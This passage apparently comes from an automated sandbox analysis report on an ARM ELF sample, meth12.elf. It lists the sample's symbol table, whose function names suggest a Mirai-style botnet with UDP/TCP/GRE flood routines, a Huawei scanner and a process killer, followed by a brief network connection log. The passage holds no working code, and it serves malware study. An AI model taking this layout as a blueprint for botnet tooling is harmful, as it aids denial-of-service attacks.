                                                          lseek.dynsym0x064FUNC<unknown>DEFAULTSHN_UNDEF
                                                          malloc.dynsym0x8b9c2360FUNC<unknown>DEFAULTSHN_UNDEF
                                                          memcpy.dynsym0x8b844FUNC<unknown>DEFAULTSHN_UNDEF
                                                          memmove.dynsym0x8b604FUNC<unknown>DEFAULTSHN_UNDEF
                                                          memset.dynsym0x8cc8156FUNC<unknown>DEFAULTSHN_UNDEF
                                                          open.dynsym0x8d28100FUNC<unknown>DEFAULTSHN_UNDEF
                                                          opendir.dynsym0x8cf8196FUNC<unknown>DEFAULTSHN_UNDEF
                                                          prctl.dynsym0x8b7868FUNC<unknown>DEFAULTSHN_UNDEF
                                                          raise.dynsym0x8d70240FUNC<unknown>DEFAULTSHN_UNDEF
                                                          rand.dynsym0x8c6824FUNC<unknown>DEFAULTSHN_UNDEF
                                                          read.dynsym0x8c80100FUNC<unknown>DEFAULTSHN_UNDEF
                                                          readdir.dynsym0x8bd8232FUNC<unknown>DEFAULTSHN_UNDEF
                                                          readlink.dynsym0x8b9064FUNC<unknown>DEFAULTSHN_UNDEF
                                                          realloc.dynsym0x8c98960FUNC<unknown>DEFAULTSHN_UNDEF
                                                          recv.dynsym0x8b3c112FUNC<unknown>DEFAULTSHN_UNDEF
                                                          recvfrom.dynsym0x8bb4136FUNC<unknown>DEFAULTSHN_UNDEF
                                                          rewinddir.dynsym0x0168FUNC<unknown>DEFAULTSHN_UNDEF
                                                          select.dynsym0x8bcc132FUNC<unknown>DEFAULTSHN_UNDEF
                                                          send.dynsym0x8bf0112FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sendto.dynsym0x8c8c136FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setsid.dynsym0x8d4064FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setsockopt.dynsym0x8c5c72FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sigaddset.dynsym0x8be480FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sigemptyset.dynsym0x8b5420FUNC<unknown>DEFAULTSHN_UNDEF
                                                          signal.dynsym0x8c74196FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sigprocmask.dynsym0x8d88140FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sleep.dynsym0x8ba8272FUNC<unknown>DEFAULTSHN_UNDEF
                                                          socket.dynsym0x8bc068FUNC<unknown>DEFAULTSHN_UNDEF
                                                          srand.dynsym0x8cd4164FUNC<unknown>DEFAULTSHN_UNDEF
                                                          time.dynsym0x8cec48FUNC<unknown>DEFAULTSHN_UNDEF
                                                          usleep.dynsym0x080FUNC<unknown>DEFAULTSHN_UNDEF
                                                          write.dynsym0x8c20100FUNC<unknown>DEFAULTSHN_UNDEF
                                                          .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                          .symtab0x80f40SECTION<unknown>DEFAULT1
                                                          .symtab0x81080SECTION<unknown>DEFAULT2
                                                          .symtab0x832c0SECTION<unknown>DEFAULT3
                                                          .symtab0x876c0SECTION<unknown>DEFAULT4
                                                          .symtab0x896c0SECTION<unknown>DEFAULT5
                                                          .symtab0x8b0c0SECTION<unknown>DEFAULT6
                                                          .symtab0x8b1c0SECTION<unknown>DEFAULT7
                                                          .symtab0x8da00SECTION<unknown>DEFAULT8
                                                          .symtab0x114540SECTION<unknown>DEFAULT9
                                                          .symtab0x114640SECTION<unknown>DEFAULT10
                                                          .symtab0x19a080SECTION<unknown>DEFAULT11
                                                          .symtab0x19a0c0SECTION<unknown>DEFAULT12
                                                          .symtab0x19a100SECTION<unknown>DEFAULT13
                                                          .symtab0x19a140SECTION<unknown>DEFAULT14
                                                          .symtab0x19a180SECTION<unknown>DEFAULT15
                                                          .symtab0x19ad00SECTION<unknown>DEFAULT16
                                                          .symtab0x19bac0SECTION<unknown>DEFAULT17
                                                          .symtab0x19c0c0SECTION<unknown>DEFAULT18
                                                          .symtab0x00SECTION<unknown>DEFAULT19
                                                          .symtab0x00SECTION<unknown>DEFAULT20
                                                          .symtab0x00SECTION<unknown>DEFAULT21
                                                          .symtab0x00SECTION<unknown>DEFAULT22
                                                          .symtab0x00SECTION<unknown>DEFAULT23
                                                          .symtab0x00SECTION<unknown>DEFAULT24
                                                          .symtab0x00SECTION<unknown>DEFAULT25
                                                          $a.symtab0x8b0c0NOTYPE<unknown>DEFAULT6
                                                          $a.symtab0x114540NOTYPE<unknown>DEFAULT9
                                                          $a.symtab0x8b180NOTYPE<unknown>DEFAULT6
                                                          $a.symtab0x114600NOTYPE<unknown>DEFAULT9
                                                          $a.symtab0x8da00NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x8dbc0NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x8df80NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x8e340NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x8f300NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x90880NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x92a40NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x93100NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x93800NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x97140NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x9da80NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xa3c40NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xa6640NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xae180NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xb5100NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xbbbc0NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xbf180NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xc1440NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xc3e40NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xc81c0NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xcd080NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xcd580NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xcdfc0NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xced00NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xd9e80NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xdb4c0NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xe2c80NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xe3380NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xe3a40NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xe4340NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xe5680NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xe5900NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xea980NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xeb600NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xecc00NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xf82c0NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0xfd540NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x104cc0NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x104f00NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x105a00NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x106500NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x108b00NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x10e180NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x10e400NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x10e780NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x10ec00NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x10ee40NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x10f080NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x10f740NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x10fd00NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x110640NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x110f40NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x112300NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x1132c0NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x114400NOTYPE<unknown>DEFAULT8
                                                          $a.symtab0x8b1c0NOTYPE<unknown>DEFAULT7
                                                          $a.symtab0x8b300NOTYPE<unknown>DEFAULT7
                                                          $d.symtab0x8db80NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0x19a100NOTYPE<unknown>DEFAULT13
                                                          $d.symtab0x8df00NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0x19a0c0NOTYPE<unknown>DEFAULT12
                                                          $d.symtab0x19bac0NOTYPE<unknown>DEFAULT17
                                                          $d.symtab0x8e280NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0x8f280NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0x90840NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0x96e00NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0x9da40NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xa3c00NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xae140NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xb50c0NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xbbb80NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xc8180NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xcd040NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xcecc0NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xd9c40NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xdb400NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xe2900NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0x19bb00NOTYPE<unknown>DEFAULT17
                                                          $d.symtab0x19bb40NOTYPE<unknown>DEFAULT17
                                                          $d.symtab0x19bb80NOTYPE<unknown>DEFAULT17
                                                          $d.symtab0xe3280NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xe3940NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xe4240NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xe5580NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xeb5c0NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xecb40NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xf8080NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0xfc880NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0x1191c0NOTYPE<unknown>DEFAULT10
                                                          $d.symtab0x119250NOTYPE<unknown>DEFAULT10
                                                          $d.symtab0x104ec0NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0x105980NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0x106480NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0x108740NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0x19bbc0NOTYPE<unknown>DEFAULT17
                                                          $d.symtab0x10e100NOTYPE<unknown>DEFAULT8
                                                          $d.symtab0x00NOTYPE<unknown>DEFAULT24
                                                          $d.symtab0x200NOTYPE<unknown>DEFAULT24
                                                          $d.symtab0x260NOTYPE<unknown>DEFAULT24
                                                          $d.symtab0x8b2c0NOTYPE<unknown>DEFAULT7
                                                          C.42.5028.symtab0x119253OBJECT<unknown>DEFAULT10
                                                          C.43.5029.symtab0x1191c9OBJECT<unknown>DEFAULT10
                                                          LOCAL_ADDR.symtab0x19cb84OBJECT<unknown>DEFAULT18
                                                          _DYNAMIC.symtab0x19a180OBJECT<unknown>HIDDEN15
                                                          _GLOBAL_OFFSET_TABLE_.symtab0x19ad00OBJECT<unknown>HIDDEN16
                                                          _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                          __FRAME_END__.symtab0x19a080OBJECT<unknown>DEFAULT11
                                                          __JCR_END__.symtab0x19a140OBJECT<unknown>DEFAULT14
                                                          __JCR_LIST__.symtab0x19a140OBJECT<unknown>DEFAULT14
                                                          __aeabi_uidiv.symtab0x1132c0FUNC<unknown>HIDDEN8
                                                          __aeabi_uidivmod.symtab0x1142824FUNC<unknown>HIDDEN8
                                                          __bss_end__.symtab0x19d640NOTYPE<unknown>DEFAULTSHN_ABS
                                                          __bss_start.symtab0x19c0c0NOTYPE<unknown>DEFAULTSHN_ABS
                                                          __bss_start__.symtab0x19c0c0NOTYPE<unknown>DEFAULTSHN_ABS
                                                          __data_start.symtab0x19bac0NOTYPE<unknown>DEFAULT17
                                                          __div0.symtab0x1144020FUNC<unknown>HIDDEN8
                                                          __do_global_dtors_aux.symtab0x8da00FUNC<unknown>DEFAULT8
                                                          __do_global_dtors_aux_fini_array_entry.symtab0x19a100OBJECT<unknown>DEFAULT13
                                                          __end__.symtab0x19d640NOTYPE<unknown>DEFAULTSHN_ABS
                                                          __errno_location.symtab0x8d1032FUNC<unknown>DEFAULTSHN_UNDEF
                                                          __exidx_end.symtab0x11a080NOTYPE<unknown>DEFAULTSHN_ABS
                                                          __exidx_start.symtab0x11a080NOTYPE<unknown>DEFAULTSHN_ABS
                                                          __frame_dummy_init_array_entry.symtab0x19a0c0OBJECT<unknown>DEFAULT12
                                                          __uClibc_main.symtab0x8cbc848FUNC<unknown>DEFAULTSHN_UNDEF
                                                          __udivsi3.symtab0x1132c252FUNC<unknown>HIDDEN8
                                                          _bss_end__.symtab0x19d640NOTYPE<unknown>DEFAULTSHN_ABS
                                                          _edata.symtab0x19c0c0NOTYPE<unknown>DEFAULTSHN_ABS
                                                          _end.symtab0x19d640NOTYPE<unknown>DEFAULTSHN_ABS
                                                          _fini.symtab0x114540FUNC<unknown>DEFAULT9
                                                          _init.symtab0x8b0c0FUNC<unknown>DEFAULT6
                                                          _start.symtab0x8df880FUNC<unknown>DEFAULT8
                                                          abort.symtab0x8bfc296FUNC<unknown>DEFAULTSHN_UNDEF
                                                          accept.symtab0x8c08116FUNC<unknown>DEFAULTSHN_UNDEF
                                                          add_auth_entry.symtab0xeb60352FUNC<unknown>DEFAULT8
                                                          atoi.symtab0x032FUNC<unknown>DEFAULTSHN_UNDEF
                                                          attack.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          attack_get_opt_int.symtab0x9310112FUNC<unknown>DEFAULT8
                                                          attack_get_opt_ip.symtab0x92a4108FUNC<unknown>DEFAULT8
                                                          attack_gre.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          attack_gre_eth.symtab0x97141684FUNC<unknown>DEFAULT8
                                                          attack_gre_ip.symtab0x9da81564FUNC<unknown>DEFAULT8
                                                          attack_init.symtab0x9380916FUNC<unknown>DEFAULT8
                                                          attack_kill_all.symtab0x8f30344FUNC<unknown>DEFAULT8
                                                          attack_ongoing.symtab0x19c1432OBJECT<unknown>DEFAULT18
                                                          attack_parse.symtab0x9088540FUNC<unknown>DEFAULT8
                                                          attack_start.symtab0x8e34252FUNC<unknown>DEFAULT8
                                                          attack_std.symtab0xa3c4672FUNC<unknown>DEFAULT8
                                                          attack_std.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          attack_tcp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          attack_tcp_ack.symtab0xae181784FUNC<unknown>DEFAULT8
                                                          attack_tcp_bypass.symtab0xbbbc860FUNC<unknown>DEFAULT8
                                                          attack_tcp_stomp.symtab0xa6641972FUNC<unknown>DEFAULT8
                                                          attack_tcp_syn.symtab0xb5101708FUNC<unknown>DEFAULT8
                                                          attack_udp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          attack_udp_bypass.symtab0xbf18556FUNC<unknown>DEFAULT8
                                                          attack_udp_generic.symtab0xc81c1260FUNC<unknown>DEFAULT8
                                                          attack_udp_plain.symtab0xc144672FUNC<unknown>DEFAULT8
                                                          attack_udp_vse.symtab0xc3e41080FUNC<unknown>DEFAULT8
                                                          auth_table.symtab0x19cac4OBJECT<unknown>DEFAULT18
                                                          auth_table_len.symtab0x19c804OBJECT<unknown>DEFAULT18
                                                          auth_table_max_weight.symtab0x19cb02OBJECT<unknown>DEFAULT18
                                                          bind.symtab0x8c3868FUNC<unknown>DEFAULTSHN_UNDEF
                                                          calloc.symtab0x8c14320FUNC<unknown>DEFAULTSHN_UNDEF
                                                          chdir.symtab0x8c5056FUNC<unknown>DEFAULTSHN_UNDEF
                                                          checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          checksum_generic.symtab0xcd0880FUNC<unknown>DEFAULT8
                                                          checksum_tcpudp.symtab0xcd58164FUNC<unknown>DEFAULT8
                                                          clock.symtab0x8d3452FUNC<unknown>DEFAULTSHN_UNDEF
                                                          close.symtab0x8d64100FUNC<unknown>DEFAULTSHN_UNDEF
                                                          closedir.symtab0x8d4c272FUNC<unknown>DEFAULTSHN_UNDEF
                                                          completed.5458.symtab0x19c0c1OBJECT<unknown>DEFAULT18
                                                          conn_table.symtab0x19c684OBJECT<unknown>DEFAULT18
                                                          conn_table.symtab0x19ccc4OBJECT<unknown>DEFAULT18
                                                          connect.symtab0x8b48116FUNC<unknown>DEFAULTSHN_UNDEF
                                                          crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          data_start.symtab0x19bac0NOTYPE<unknown>DEFAULT17
                                                          ensure_single_instance.symtab0xd9e8356FUNC<unknown>DEFAULT8
                                                          exit.symtab0x8d1c196FUNC<unknown>DEFAULTSHN_UNDEF
                                                          fake_time.symtab0x19cb44OBJECT<unknown>DEFAULT18
                                                          fcntl.symtab0x8d58244FUNC<unknown>DEFAULTSHN_UNDEF
                                                          fd_ctrl.symtab0x19bb04OBJECT<unknown>DEFAULT17
                                                          fd_serv.symtab0x19bb44OBJECT<unknown>DEFAULT17
                                                          fork.symtab0x8cb0972FUNC<unknown>DEFAULTSHN_UNDEF
                                                          frame_dummy.symtab0x8dbc0FUNC<unknown>DEFAULT8
                                                          free.symtab0x8d7c572FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getpid.symtab0x8b6c72FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getppid.symtab0x8ce020FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getsockname.symtab0x8d9468FUNC<unknown>DEFAULTSHN_UNDEF
                                                          getsockopt.symtab0x8d0472FUNC<unknown>DEFAULTSHN_UNDEF
                                                          huawei.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          huawei_fake_time.symtab0x19c644OBJECT<unknown>DEFAULT18
                                                          huawei_init.symtab0xced02840FUNC<unknown>DEFAULT8
                                                          huawei_rsck.symtab0x19c384OBJECT<unknown>DEFAULT18
                                                          huawei_scanner_pid.symtab0x19c344OBJECT<unknown>DEFAULT18
                                                          huawei_scanner_rawpkt.symtab0x19c3c40OBJECT<unknown>DEFAULT18
                                                          huawei_setup_connection.symtab0xcdfc212FUNC<unknown>DEFAULT8
                                                          inet_addr.symtab0x8c4440FUNC<unknown>DEFAULTSHN_UNDEF
                                                          initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          ioctl.symtab0x8b30224FUNC<unknown>DEFAULTSHN_UNDEF
                                                          kill.symtab0x8c2c56FUNC<unknown>DEFAULTSHN_UNDEF
                                                          killer.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          killer_kill_by_port.symtab0x108b01384FUNC<unknown>DEFAULT8
                                                          listen.symtab0x8ca464FUNC<unknown>DEFAULTSHN_UNDEF
                                                          local_bind.4753.symtab0x19bb81OBJECT<unknown>DEFAULT17
                                                          lseek.symtab0x064FUNC<unknown>DEFAULTSHN_UNDEF
                                                          main.symtab0xdb4c1916FUNC<unknown>DEFAULT8
                                                          main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          malloc.symtab0x8b9c2360FUNC<unknown>DEFAULTSHN_UNDEF
                                                          memcpy.symtab0x8b844FUNC<unknown>DEFAULTSHN_UNDEF
                                                          memmove.symtab0x8b604FUNC<unknown>DEFAULTSHN_UNDEF
                                                          memset.symtab0x8cc8156FUNC<unknown>DEFAULTSHN_UNDEF
                                                          methods.symtab0x19c104OBJECT<unknown>DEFAULT18
                                                          methods_len.symtab0x19c0d1OBJECT<unknown>DEFAULT18
                                                          open.symtab0x8d28100FUNC<unknown>DEFAULTSHN_UNDEF
                                                          opendir.symtab0x8cf8196FUNC<unknown>DEFAULTSHN_UNDEF
                                                          pending_connection.symtab0x19c6c1OBJECT<unknown>DEFAULT18
                                                          prctl.symtab0x8b7868FUNC<unknown>DEFAULTSHN_UNDEF
                                                          raise.symtab0x8d70240FUNC<unknown>DEFAULTSHN_UNDEF
                                                          rand.symtab0x8c6824FUNC<unknown>DEFAULTSHN_UNDEF
                                                          rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          rand_init.symtab0xe338108FUNC<unknown>DEFAULT8
                                                          rand_next.symtab0xe2c8112FUNC<unknown>DEFAULT8
                                                          rand_next_range.symtab0xe3a4144FUNC<unknown>DEFAULT8
                                                          rand_str.symtab0xe434308FUNC<unknown>DEFAULT8
                                                          read.symtab0x8c80100FUNC<unknown>DEFAULTSHN_UNDEF
                                                          readdir.symtab0x8bd8232FUNC<unknown>DEFAULTSHN_UNDEF
                                                          readlink.symtab0x8b9064FUNC<unknown>DEFAULTSHN_UNDEF
                                                          realloc.symtab0x8c98960FUNC<unknown>DEFAULTSHN_UNDEF
                                                          recv.symtab0x8b3c112FUNC<unknown>DEFAULTSHN_UNDEF
                                                          recvfrom.symtab0x8bb4136FUNC<unknown>DEFAULTSHN_UNDEF
                                                          resolv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          resolv_entries_free.symtab0xe56840FUNC<unknown>DEFAULT8
                                                          resolv_lookup.symtab0xe5901288FUNC<unknown>DEFAULT8
                                                          rewinddir.symtab0x0168FUNC<unknown>DEFAULTSHN_UNDEF
                                                          rsck.symtab0x19cd04OBJECT<unknown>DEFAULT18
                                                          rsck_out.symtab0x19cd84OBJECT<unknown>DEFAULT18
                                                          scanner.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          scanner_init.symtab0xecc06156FUNC<unknown>DEFAULT8
                                                          scanner_pid.symtab0x19cd44OBJECT<unknown>DEFAULT18
                                                          scanner_rawpkt.symtab0x19c8440OBJECT<unknown>DEFAULT18
                                                          select.symtab0x8bcc132FUNC<unknown>DEFAULTSHN_UNDEF
                                                          send.symtab0x8bf0112FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sendto.symtab0x8c8c136FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setsid.symtab0x8d4064FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setsockopt.symtab0x8c5c72FUNC<unknown>DEFAULTSHN_UNDEF
                                                          setup_connection.symtab0xea98200FUNC<unknown>DEFAULT8
                                                          sigaddset.symtab0x8be480FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sigemptyset.symtab0x8b5420FUNC<unknown>DEFAULTSHN_UNDEF
                                                          signal.symtab0x8c74196FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sigprocmask.symtab0x8d88140FUNC<unknown>DEFAULTSHN_UNDEF
                                                          sleep.symtab0x8ba8272FUNC<unknown>DEFAULTSHN_UNDEF
                                                          socket.symtab0x8bc068FUNC<unknown>DEFAULTSHN_UNDEF
                                                          srand.symtab0x8cd4164FUNC<unknown>DEFAULTSHN_UNDEF
                                                          srv_addr.symtab0x19cbc16OBJECT<unknown>DEFAULT18
                                                          table.symtab0x19cdc136OBJECT<unknown>DEFAULT18
                                                          table.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          table_init.symtab0x10650608FUNC<unknown>DEFAULT8
                                                          table_keys.symtab0x19bbc80OBJECT<unknown>DEFAULT17
                                                          table_lock_val.symtab0x104f0176FUNC<unknown>DEFAULT8
                                                          table_retrieve_val.symtab0x104cc36FUNC<unknown>DEFAULT8
                                                          table_unlock_val.symtab0x105a0176FUNC<unknown>DEFAULT8
                                                          tcp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          time.symtab0x8cec48FUNC<unknown>DEFAULTSHN_UNDEF
                                                          usleep.symtab0x080FUNC<unknown>DEFAULTSHN_UNDEF
                                                          util.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                          util_atoi.symtab0x110f4316FUNC<unknown>DEFAULT8
                                                          util_fdgets.symtab0x10f7492FUNC<unknown>DEFAULT8
                                                          util_itoa.symtab0x11230252FUNC<unknown>DEFAULT8
                                                          util_local_addr.symtab0x10fd0148FUNC<unknown>DEFAULT8
                                                          util_memcpy.symtab0x10ec036FUNC<unknown>DEFAULT8
                                                          util_memsearch.symtab0x10f08108FUNC<unknown>DEFAULT8
                                                          util_strcat.symtab0x10e4056FUNC<unknown>DEFAULT8
                                                          util_strcpy.symtab0x10e7872FUNC<unknown>DEFAULT8
                                                          util_stristr.symtab0x11064144FUNC<unknown>DEFAULT8
                                                          util_strlen.symtab0x10e1840FUNC<unknown>DEFAULT8
                                                          util_zero.symtab0x10ee436FUNC<unknown>DEFAULT8
                                                          w.symtab0x19c7c4OBJECT<unknown>DEFAULT18
                                                          write.symtab0x8c20100FUNC<unknown>DEFAULTSHN_UNDEF
                                                          x.symtab0x19c704OBJECT<unknown>DEFAULT18
                                                          y.symtab0x19c744OBJECT<unknown>DEFAULT18
                                                          z.symtab0x19c784OBJECT<unknown>DEFAULT18
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 14, 2025 15:53:54.508852005 CET43928443192.168.2.2391.189.91.42
                                                          Jan 14, 2025 15:53:59.884166956 CET42836443192.168.2.2391.189.91.43
                                                          Jan 14, 2025 15:54:01.419987917 CET4251680192.168.2.23109.202.202.202
                                                          Jan 14, 2025 15:54:15.498028994 CET43928443192.168.2.2391.189.91.42
                                                          Jan 14, 2025 15:54:25.736618042 CET42836443192.168.2.2391.189.91.43
                                                          Jan 14, 2025 15:54:31.879765034 CET4251680192.168.2.23109.202.202.202
                                                          Jan 14, 2025 15:54:56.452250004 CET43928443192.168.2.2391.189.91.42
                                                          Jan 14, 2025 15:55:16.929404020 CET42836443192.168.2.2391.189.91.43

                                                          System Behavior

                                                          Start time (UTC):14:53:54
                                                          Start date (UTC):14/01/2025
                                                          Path:/tmp/meth12.elf
                                                          Arguments:/tmp/meth12.elf
                                                          File size:4956856 bytes
                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1